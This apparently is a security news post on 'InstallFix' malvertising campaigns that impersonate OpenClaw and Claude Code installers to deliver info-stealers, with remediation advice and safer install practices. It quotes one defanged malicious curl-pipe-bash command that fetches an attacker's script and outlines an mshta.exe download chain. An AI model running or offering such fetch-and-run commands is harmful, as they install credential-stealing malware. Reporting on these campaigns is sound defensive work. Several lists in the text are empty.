🚨 Breaking — March 7, 2026  |  Sources: Push Security, BleepingComputer, Huntress MDR

On March 5, Huntress MDR discovered attackers impersonating OpenClaw installers on GitHub, delivering Vidar stealer and a GhostSocks backconnect proxy to Windows users and Atomic Stealer to macOS users.

One week later, the same playbook — with a different target. Push Security and BleepingComputer confirmed on March 6 that attackers are now impersonating Claude Code, Anthropic's AI coding assistant, via Google Ads malvertising. The payload this time is Amatera Stealer, a new Malware-as-a-Service info-stealer targeting browser credentials, session tokens, and cryptocurrency wallets.

BleepingComputer explicitly cited the fake OpenClaw campaign as the precedent case. We covered that campaign last week. The pattern has a name now: InstallFix.

What Is InstallFix?

InstallFix is a social engineering technique, a close cousin to ClickFix, specifically designed to exploit developers' trust in curl | bash install patterns.

ClickFix, which emerged in 2024, tricks non-technical users with fake browser error dialogs: "Your browser detected a problem — press Win+R and paste this command to fix it." The command runs PowerShell. The user never questions it because it looks like a real system error.

InstallFix is the developer version of the same trick. Instead of a fake browser error, it clones the actual installation documentation for a real CLI tool. The page looks pixel-perfect — same fonts, same layout, same branding. Every link redirects to the real, legitimate site. The only thing that's different is the install command.

It's subtle enough to fool experienced developers. If you search for "install claude code" on Google and the first result is a Squarespace site with Anthropic's branding, how long would you look before running the curl command?

"Just hosting malware on GitHub was enough" — Huntress MDR, describing how the fake OpenClaw repositories were promoted by Bing AI search without any active exploitation.

Campaign 1: Fake OpenClaw (March 5)

The first confirmed InstallFix campaign targeted OpenClaw, the AI agent orchestration platform. (Note: the official OpenClaw repository is at github.com/openclaw/openclaw — not any search result.)

Huntress MDR discovered a fake GitHub organisation, openclaw-installer, that had copied legitimate Cloudflare Moltworker code to appear credible. The repositories were indexed and promoted by Bing AI's search results without any paid placement — just organic AI-recommended results.

Windows payload chain:

macOS payload chain:

The campaign was reported to GitHub. Removal status was unclear as of initial disclosure. The fake repositories leveraged GitHub's HTTPS certification to avoid the most basic browser warnings.

Campaign 2: Fake Claude Code — Amatera Stealer via Google Ads (March 6)

One week after the OpenClaw campaign, Push Security and BleepingComputer confirmed a second active InstallFix campaign targeting Claude Code.

This campaign is more sophisticated in its delivery mechanism: instead of relying on search engine AI recommendations or organic results, it uses Google Ads malvertising. Paid ads targeting "install claude code" promoted a malicious Squarespace site — claude-code-cmd.squarespace[.]com — confirmed live as of March 7.

Squarespace was chosen deliberately. It provides:

The same pattern also extended to deployments on Cloudflare Pages and Tencent EdgeOne — all legitimate content delivery platforms that attackers are weaponising as a trusted infrastructure bypass.

The Attack Chain

macOS

The fake install page presents a command like:

curl -fsSL https://claude-code-cmd[.]squarespace[.]com/install.sh | bash

The install script is base64-encoded before delivery, making it opaque in logs and to shallow inspection. Once decoded and executed, it retrieves Amatera Stealer from a secondary attacker-controlled domain and executes it in memory.

Windows

On Windows, the attack leverages mshta.exe — Microsoft's HTML Application Host, a legitimate Windows binary used to run HTA (HTML Application) files. Mshta.exe is a Living Off the Land Binary (LOLBin) — a signed Microsoft binary that security tools trust.

The infection chain:

  1. User runs the malicious install command from the fake page
  2. Command invokes mshta.exe with a remote URL pointing to an HTA file
  3. HTA file contains obfuscated VBScript/JavaScript that downloads Amatera Stealer
  4. Payload executes via conhost.exe — another Windows LOLBin that blends with normal console activity

Both delivery paths avoid writing a traditional .exe to disk. This defeats file-hash-based detection and many endpoint security tools that focus on executable drops rather than script execution chains.

Amatera Stealer: What It Takes

Amatera Stealer is a relatively new Malware-as-a-Service info-stealer believed to be derived from ACR Stealer (itself a continuation of the Raccoon Stealer lineage, whose original author was arrested in 2022).

What Amatera steals:

The MaaS model means Amatera is available to any buyer willing to pay a subscription fee. The fake Claude Code campaign may not be the work of a sophisticated nation-state actor — it could be a criminal group that rented the stealer for a few hundred dollars and bought $50 in Google Ads.

This is the commoditisation of developer targeting. The attacker doesn't need to write malware. They need brand awareness of which developer tools people are currently installing.

Why This Pattern Works

Developer culture has a deeply embedded trust in curl | bash. The pattern was established by tools like Homebrew, Node Version Manager (nvm), Rust's rustup, and countless others. The security community has warned about this pattern for years — "never pipe to bash without reading the script first" — and yet it remains dominant because it genuinely is the most convenient install mechanism for cross-platform tooling.

The InstallFix technique exploits three compounding factors:

  1. AI tool adoption urgency: Claude Code, OpenClaw, and similar tools are new and exciting. Developers want to install them quickly. They're less cautious with new tools than established ones.
  2. Search result trust: Developers implicitly trust the first result on Google and Bing. Google Ads at the top of the results page look identical to organic results in most browsers.
  3. Platform trust bypass: Squarespace and Cloudflare Pages are used by millions of legitimate businesses. No security tool flags them as suspicious. The HTTPS padlock is present. There are no browser warnings.

The Bing AI angle (fake OpenClaw campaign) adds a fourth factor: AI-curated search results that recommend repositories without adequate provenance verification. An AI recommending a malicious GitHub repository is a much stronger endorsement than a normal search result — users trust AI curation.

Detection Guidance

If You Think You May Have Run a Malicious Install Command

Assume full credential compromise and act accordingly:

  1. Rotate all browser-saved passwords immediately. Use your password manager's bulk-change feature if available. Prioritise: email accounts, banking, any service with cryptocurrency or payment methods.
  2. Revoke active session tokens. On all important accounts: log out all other sessions, revoke OAuth app authorisations, check for any new authorised applications or API tokens you didn't create.
  3. Move cryptocurrency assets. If you have any crypto holdings, transfer to a new wallet address now. A compromised seed phrase is an irreversible loss.
  4. Enable FIDO2 hardware keys on critical accounts. Unlike SMS OTP and authenticator-app TOTP, FIDO2 phishing-resistant MFA cannot be bypassed with stolen session cookies. A hardware security key would have protected you even after credential theft.
  5. Re-image the affected machine if any production credentials or secrets were stored on it. Amatera is primarily an info-stealer but the GhostSocks proxy (fake OpenClaw campaign) establishes persistent remote access.

Endpoint Detection

If you run EDR on developer machines (you should), look for:

Safer Install Patterns Going Forward

If you must run a curl-pipe-bash install, inspect the script first:

# ❌ What most people do (dangerous):
curl -fsSL https://example.com/install.sh | bash

# ✅ What you should do (safe):
curl -fsSL https://example.com/install.sh -o install.sh
cat install.sh        # read it first
bash install.sh       # run it only if it looks legitimate

Better still: bookmark the official GitHub repository for every developer tool you use and only install from there. For AI CLI tools specifically, the official channels are:

The Trend: AI Tool Impersonation Is Accelerating

In the past six months, security researchers have confirmed malvertising campaigns impersonating Notepad++, 7-Zip, WinRAR, Obsidian, Git, and now Claude Code and OpenClaw. The common thread: tools that developers and technically sophisticated users install frequently.

The AI CLI category is especially attractive for attackers because:

  1. Novelty: New tools have less established "official install" muscle memory. Users are more likely to click the first result.
  2. Privileged installation: AI CLI tools typically request broad permissions (API key access, file system access, network access). Users accept these permissions as part of a normal install.
  3. High-value targets: Developers installing AI coding tools typically have: code repositories, cloud API keys, AWS/GCP credentials, SSH keys, and access to production systems. The expected credential yield per victim is higher than a typical consumer target.
  4. Low search literacy: "How do I install Claude Code?" is not a query that has an established, trusted answer in most users' minds. It's exactly the query type where a search result or AI recommendation carries disproportionate authority.

The recommendation: treat all AI tool install instructions from search results with the same scepticism you'd apply to a random GitHub repository from an unknown author. Verify against the official project site directly. Check the npm/PyPI publisher is the official organisation. When in doubt, don't run it.


Recommended Security Resources

If you're hardening your developer environment against credential theft and session hijacking:


💰 Affiliate disclosure: Links to Amazon products above use our affiliate tag (altclaw-20). If you purchase through these links, we receive a small commission at no extra cost to you. We only link to products we recommend for genuine security reasons.

Advertisement